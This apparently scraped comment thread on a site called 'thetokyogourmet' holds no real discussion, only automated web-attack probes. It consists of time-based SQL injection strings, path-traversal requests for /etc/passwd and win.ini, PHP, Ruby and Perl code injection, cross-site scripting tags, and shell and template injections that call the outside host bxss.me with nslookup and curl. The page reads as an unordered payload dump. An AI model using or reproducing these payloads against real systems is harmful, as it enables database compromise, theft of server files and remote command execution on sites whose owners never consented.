-1 OR 2+900-900-1=0+0+0+1
re: thetokyogourmet
-1 OR 3+900-900-1=0+0+0+1
re: thetokyogourmet
BQPiKUGM') OR 835=(SELECT 835 FROM PG_SLEEP(15))--
re: thetokyogourmet
if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
RqEq6rqy')) OR 149=(SELECT 149 FROM PG_SLEEP(15))--
re: thetokyogourmet
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
1'"
re: thetokyogourmet
@@NO4a6
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
1 waitfor delay '0:0:15' --
re: thetokyogourmet
56oVhdtu'; waitfor delay '0:0:15' --
re: thetokyogourmet
-5 OR 297=(SELECT 297 FROM PG_SLEEP(15))--
re: thetokyogourmet
-5) OR 554=(SELECT 554 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1)) OR 126=(SELECT 126 FROM PG_SLEEP(15))--
re: thetokyogourmet
Hyj4pUip' OR 511=(SELECT 511 FROM PG_SLEEP(15))--
re: thetokyogourmet
lpK0saFJ') OR 789=(SELECT 789 FROM PG_SLEEP(15))--
re: thetokyogourmet
CwrTGiQV')) OR 766=(SELECT 766 FROM PG_SLEEP(15))--
re: thetokyogourmet
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
1'"
re: thetokyogourmet
@@f4i8a
re: thetokyogourmet
1D9MhAQEO
re: thetokyogourmet
response.write(9402255*9079911)
re: thetokyogourmet
%0abcc:074625.67-13762.67.b436f.19990.2@bxss.me
re: thetokyogourmet
<esi:include src="http://bxss.me/rpb.png"/>
re: thetokyogourmet
'+response.write(9402255*9079911)+'
re: thetokyogourmet
to@example.com>%0d%0abcc:074625.67-13763.67.b436f.19990.2@bxss.me
re: thetokyogourmet
"+response.write(9402255*9079911)+"
re: thetokyogourmet
${9999840+10000311}
re: thetokyogourmet
../../../../../../../../../../../../../../etc/passwd
re: thetokyogourmet
../../../../../../../../../../../../../../windows/win.ini
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
../../../../../../../../../../../../../../../proc/version
re: thetokyogourmet
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: thetokyogourmet
)
re: thetokyogourmet
../../../../../../../../../../etc/passwd%00.jpg
re: thetokyogourmet
'.gethostbyname(lc('hitwl'.'ncgowndr40dd7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(68).chr(112).chr(82).'
re: thetokyogourmet
!(()&&!|*|*|
re: thetokyogourmet
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: thetokyogourmet
".gethostbyname(lc("hitfv"."iydgahnebe6a0.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(77).chr(109).chr(82)."
re: thetokyogourmet
^(#$!@#$)(()))******
re: thetokyogourmet
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: thetokyogourmet
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: thetokyogourmet
/etc/passwd
re: thetokyogourmet
HttP://bxss.me/t/xss.html?%00
re: thetokyogourmet
%2fetc%2fpasswd
re: thetokyogourmet
bxss.me/t/xss.html?%00
re: thetokyogourmet
echo nluogo$()\ gvfike\nz^xyu||a #' &echo nluogo$()\ gvfike\nz^xyu||a #|" &echo nluogo$()\ gvfike\nz^xyu||a #
re: thetokyogourmet
/.././.././.././.././.././.././.././../etc/./passwd%00
re: thetokyogourmet
"+"A".concat(70-3).concat(22*4).concat(114).concat(75).concat(116).concat(76)+(require"socket"
Socket.gethostbyname("hitcc"+"ohegohlkba321.bxss.me.")[3].to_s)+"
re: thetokyogourmet
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: thetokyogourmet
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: thetokyogourmet
&echo nstvfa$()\ xkzrfw\nz^xyu||a #' &echo nstvfa$()\ xkzrfw\nz^xyu||a #|" &echo nstvfa$()\ xkzrfw\nz^xyu||a #
re: thetokyogourmet
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: thetokyogourmet
'+'A'.concat(70-3).concat(22*4).concat(97).concat(75).concat(122).concat(78)+(require'socket'
Socket.gethostbyname('hitht'+'celsobil8d958.bxss.me.')[3].to_s)+'
re: thetokyogourmet
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: thetokyogourmet
|echo scinwf$()\ umbdqj\nz^xyu||a #' |echo scinwf$()\ umbdqj\nz^xyu||a #|" |echo scinwf$()\ umbdqj\nz^xyu||a #
re: thetokyogourmet
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: thetokyogourmet
Http://bxss.me/t/fit.txt
re: thetokyogourmet
(nslookup hitnggkvpevnq69651.bxss.me||perl -e "gethostbyname('hitnggkvpevnq69651.bxss.me')")
re: thetokyogourmet
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: thetokyogourmet
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: thetokyogourmet
http://bxss.me/t/fit.txt%3F.jpg
re: thetokyogourmet
'"
re: thetokyogourmet
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: thetokyogourmet
$(nslookup hitaewqhxeehmdbbaa.bxss.me||perl -e "gethostbyname('hitaewqhxeehmdbbaa.bxss.me')")
re: thetokyogourmet
';print(md5(31337));$a='
re: thetokyogourmet
/etc/shells
re: thetokyogourmet
<!--
re: thetokyogourmet
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: thetokyogourmet
&nslookup hityamlktnwpw7e504.bxss.me&'\"`0&nslookup hityamlktnwpw7e504.bxss.me&`'
re: thetokyogourmet
";print(md5(31337));$a="
re: thetokyogourmet
c:/windows/win.ini
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
&(nslookup hitivgdznofcva6ab4.bxss.me||perl -e "gethostbyname('hitivgdznofcva6ab4.bxss.me')")&'\"`0&(nslookup hitivgdznofcva6ab4.bxss.me||perl -e "gethostbyname('hitivgdznofcva6ab4.bxss.me')")&`'
re: thetokyogourmet
${@print(md5(31337))}
re: thetokyogourmet
bxss.me
re: thetokyogourmet
/\../\../\../\../\../\../\../etc/passwd
re: thetokyogourmet
|(nslookup hitnhgtoqrmzy4c2e1.bxss.me||perl -e "gethostbyname('hitnhgtoqrmzy4c2e1.bxss.me')")
re: thetokyogourmet
${@print(md5(31337))}\
re: thetokyogourmet
/WEB-INF/web.xml
re: thetokyogourmet
`(nslookup hitqldsncwexs1a7af.bxss.me||perl -e "gethostbyname('hitqldsncwexs1a7af.bxss.me')")`
re: thetokyogourmet
'.print(md5(31337)).'
re: thetokyogourmet
C:\WINDOWS\system32\drivers\etc\hosts
re: thetokyogourmet
;(nslookup hitpotgcxrwgm020cd.bxss.me||perl -e "gethostbyname('hitpotgcxrwgm020cd.bxss.me')")|(nslookup hitpotgcxrwgm020cd.bxss.me||perl -e "gethostbyname('hitpotgcxrwgm020cd.bxss.me')")&(nslookup hitpotgcxrwgm020cd.bxss.me||perl -e "gethostbyname('hitpotgcxrwgm020cd.bxss.me')")
re: thetokyogourmet
../../../../../../../../../../windows/win.ini%00.jpg
re: thetokyogourmet
/../../../../../../../../../../boot.ini
re: thetokyogourmet
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: thetokyogourmet
..\..\..\..\..\..\..\..\windows\win.ini
re: thetokyogourmet
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: thetokyogourmet
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: thetokyogourmet
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: thetokyogourmet
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: thetokyogourmet
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: thetokyogourmet
WEB-INF/web.xml
re: thetokyogourmet
WEB-INF\web.xml
re: thetokyogourmet
1
re: thetokyogourmet
1
re: thetokyogourmet
-1 OR 2+632-632-1=0+0+0+1 --
re: thetokyogourmet
-1 OR 3+632-632-1=0+0+0+1 --
re: thetokyogourmet
-1 OR 2+859-859-1=0+0+0+1
re: thetokyogourmet
-1 OR 3+859-859-1=0+0+0+1
re: thetokyogourmet
-1' OR 2+682-682-1=0+0+0+1 --
re: thetokyogourmet
-1' OR 3+682-682-1=0+0+0+1 --
re: thetokyogourmet
-1' OR 2+569-569-1=0+0+0+1 or 'eKcLoK1t'='
re: thetokyogourmet
-1' OR 3+569-569-1=0+0+0+1 or 'eKcLoK1t'='
re: thetokyogourmet
-1" OR 2+160-160-1=0+0+0+1 --
re: thetokyogourmet
-1" OR 3+160-160-1=0+0+0+1 --
re: thetokyogourmet
if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
1 waitfor delay '0:0:15' --
re: thetokyogourmet
dPukxIMd'; waitfor delay '0:0:15' --
re: thetokyogourmet
-5 OR 720=(SELECT 720 FROM PG_SLEEP(15))--
re: thetokyogourmet
-5) OR 160=(SELECT 160 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1)) OR 730=(SELECT 730 FROM PG_SLEEP(15))--
re: thetokyogourmet
8ah2nDAU' OR 612=(SELECT 612 FROM PG_SLEEP(15))--
re: thetokyogourmet
XchLWGAX') OR 294=(SELECT 294 FROM PG_SLEEP(15))--
re: thetokyogourmet
7EWRXkhw')) OR 292=(SELECT 292 FROM PG_SLEEP(15))--
re: thetokyogourmet
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
1'"
re: thetokyogourmet
@@Adde2
re: thetokyogourmet
1
re: thetokyogourmet
1
re: thetokyogourmet
1
re: thetokyogourmet
1
re: thetokyogourmet
1
re: thetokyogourmet
1
re: thetokyogourmet
1BAG7SR2520
re: thetokyogourmet
response.write(9284055*9452567)
re: thetokyogourmet
'+response.write(9284055*9452567)+'
re: thetokyogourmet
"+response.write(9284055*9452567)+"
re: thetokyogourmet
<esi:include src="http://bxss.me/rpb.png"/>
re: thetokyogourmet
${10000293+9999741}
re: thetokyogourmet
../../../../../../../../../../../../../../etc/passwd
re: thetokyogourmet
../../../../../../../../../../../../../../windows/win.ini
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
redirtest.acx
re: thetokyogourmet
)
re: thetokyogourmet
../
re: thetokyogourmet
!(()&&!|*|*|
re: thetokyogourmet
^(#$!@#$)(()))******
re: thetokyogourmet
ctime
sleep
p0
(I30
tp1
Rp2
.
re: thetokyogourmet
'.gethostbyname(lc('hitzd'.'slzrrfasd3b8c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(82).chr(106).chr(84).'
re: thetokyogourmet
".gethostbyname(lc("hitov"."oevxnpzoc6cec.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(89).chr(102).chr(83)."
re: thetokyogourmet
gethostbyname(lc('hitti'.'flnwkphi6e76d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(72).chr(111).chr(72)
re: thetokyogourmet
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: thetokyogourmet
HttP://bxss.me/t/xss.html?%00
re: thetokyogourmet
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg
re: thetokyogourmet
bxss.me/t/xss.html?%00
re: thetokyogourmet
/etc/shells
re: thetokyogourmet
../../../../../../../../../../../../../../etc/shells
re: thetokyogourmet
c:/windows/win.ini
re: thetokyogourmet
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: thetokyogourmet
"+"A".concat(70-3).concat(22*4).concat(115).concat(73).concat(108).concat(77)+(require"socket"
Socket.gethostbyname("hitma"+"nxhzmzvbb2d7f.bxss.me.")[3].to_s)+"
re: thetokyogourmet
replies
re: thetokyogourmet
echo xcwrhz$()\ mpcbcq\nz^xyu||a #' &echo xcwrhz$()\ mpcbcq\nz^xyu||a #|" &echo xcwrhz$()\ mpcbcq\nz^xyu||a #
re: thetokyogourmet
bxss.me
re: thetokyogourmet
';print(md5(31337));$a='
re: thetokyogourmet
'+'A'.concat(70-3).concat(22*4).concat(106).concat(84).concat(112).concat(65)+(require'socket'
Socket.gethostbyname('hitnt'+'vggsmjtjef279.bxss.me.')[3].to_s)+'
re: thetokyogourmet
replies
re: thetokyogourmet
'"
re: thetokyogourmet
&echo kpcfvm$()\ bccshy\nz^xyu||a #' &echo kpcfvm$()\ bccshy\nz^xyu||a #|" &echo kpcfvm$()\ bccshy\nz^xyu||a #
re: thetokyogourmet
Http://bxss.me/t/fit.txt
re: thetokyogourmet
";print(md5(31337));$a="
re: thetokyogourmet
'A'.concat(70-3).concat(22*4).concat(98).concat(76).concat(109).concat(85)+(require'socket'
Socket.gethostbyname('hitqx'+'sgllgcpi324b9.bxss.me.')[3].to_s)
re: thetokyogourmet
replies/.
re: thetokyogourmet
<!--
re: thetokyogourmet
|echo eesqfh$()\ yqtmsd\nz^xyu||a #' |echo eesqfh$()\ yqtmsd\nz^xyu||a #|" |echo eesqfh$()\ yqtmsd\nz^xyu||a #
re: thetokyogourmet
http://bxss.me/t/fit.txt?.jpg
re: thetokyogourmet
${@print(md5(31337))}
re: thetokyogourmet
expr 9000549725 - 934730
re: thetokyogourmet
${@print(md5(31337))}\
re: thetokyogourmet
'"()
re: thetokyogourmet
(nslookup -q=cname hitjgarjsoeko8b801.bxss.me||curl hitjgarjsoeko8b801.bxss.me))
re: thetokyogourmet
'.print(md5(31337)).'
re: thetokyogourmet
'&&sleep(27*1000)*eizkpi&&'
re: thetokyogourmet
$(nslookup -q=cname hitwfmqorstsrbf38f.bxss.me||curl hitwfmqorstsrbf38f.bxss.me)
re: thetokyogourmet
"&&sleep(27*1000)*ngvggz&&"
re: thetokyogourmet
&nslookup -q=cname hitpliqmzetsd51093.bxss.me&'\"`0&nslookup -q=cname hitpliqmzetsd51093.bxss.me&`'
re: thetokyogourmet
'||sleep(27*1000)*cgydcq||'
re: thetokyogourmet
'"()&%<zzz><ScRiPt >xcSh(9292)</ScRiPt>
re: thetokyogourmet
&(nslookup -q=cname hitiuciqistciec0fb.bxss.me||curl hitiuciqistciec0fb.bxss.me)&'\"`0&(nslookup -q=cname hitiuciqistciec0fb.bxss.me||curl hitiuciqistciec0fb.bxss.me)&`'
re: thetokyogourmet
"||sleep(27*1000)*zkbpdg||"
re: thetokyogourmet
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitjpieatrnbpcdf23.bxss.me")}}
re: thetokyogourmet
|(nslookup -q=cname hitdipckbfnkc09de1.bxss.me||curl hitdipckbfnkc09de1.bxss.me)
re: thetokyogourmet
'"()&%<zzz><ScRiPt >xcSh(9139)</ScRiPt>
re: thetokyogourmet
`(nslookup -q=cname hitdokbmowozhc9dad.bxss.me||curl hitdokbmowozhc9dad.bxss.me)`
re: thetokyogourmet
9572262
re: thetokyogourmet
;(nslookup -q=cname hitlownnzmlbl5dd1b.bxss.me||curl hitlownnzmlbl5dd1b.bxss.me)|(nslookup -q=cname hitlownnzmlbl5dd1b.bxss.me||curl hitlownnzmlbl5dd1b.bxss.me)&(nslookup -q=cname hitlownnzmlbl5dd1b.bxss.me||curl hitlownnzmlbl5dd1b.bxss.me)
re: thetokyogourmet
|(nslookup${IFS}-q${IFS}cname${IFS}hitaobaqapfpd39ec3.bxss.me||curl${IFS}hitaobaqapfpd39ec3.bxss.me)
re: thetokyogourmet
&(nslookup${IFS}-q${IFS}cname${IFS}hitqhgqiodeoaa4116.bxss.me||curl${IFS}hitqhgqiodeoaa4116.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitqhgqiodeoaa4116.bxss.me||curl${IFS}hitqhgqiodeoaa4116.bxss.me)&`'
re: thetokyogourmet
eom5vdiH
re: thetokyogourmet
*1
re: thetokyogourmet
*1
re: thetokyogourmet
*1
re: thetokyogourmet
*1
re: thetokyogourmet
-1 OR 5*5=25 --
re: thetokyogourmet
-1 OR 5*5=26 --
re: thetokyogourmet
-1 OR 5*5=25
re: thetokyogourmet
-1 OR 5*5=26
re: thetokyogourmet
*if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
-1 waitfor delay '0:0:15' --
re: thetokyogourmet
BJJ2OkZ2'; waitfor delay '0:0:15' --
re: thetokyogourmet
-1 OR 212=(SELECT 212 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1) OR 300=(SELECT 300 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1)) OR 454=(SELECT 454 FROM PG_SLEEP(15))--
re: thetokyogourmet
Q74kIgCZ' OR 612=(SELECT 612 FROM PG_SLEEP(15))--
re: thetokyogourmet
dYyRVG7C') OR 284=(SELECT 284 FROM PG_SLEEP(15))--
re: thetokyogourmet
Hsc5K2wX')) OR 296=(SELECT 296 FROM PG_SLEEP(15))--
re: thetokyogourmet
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
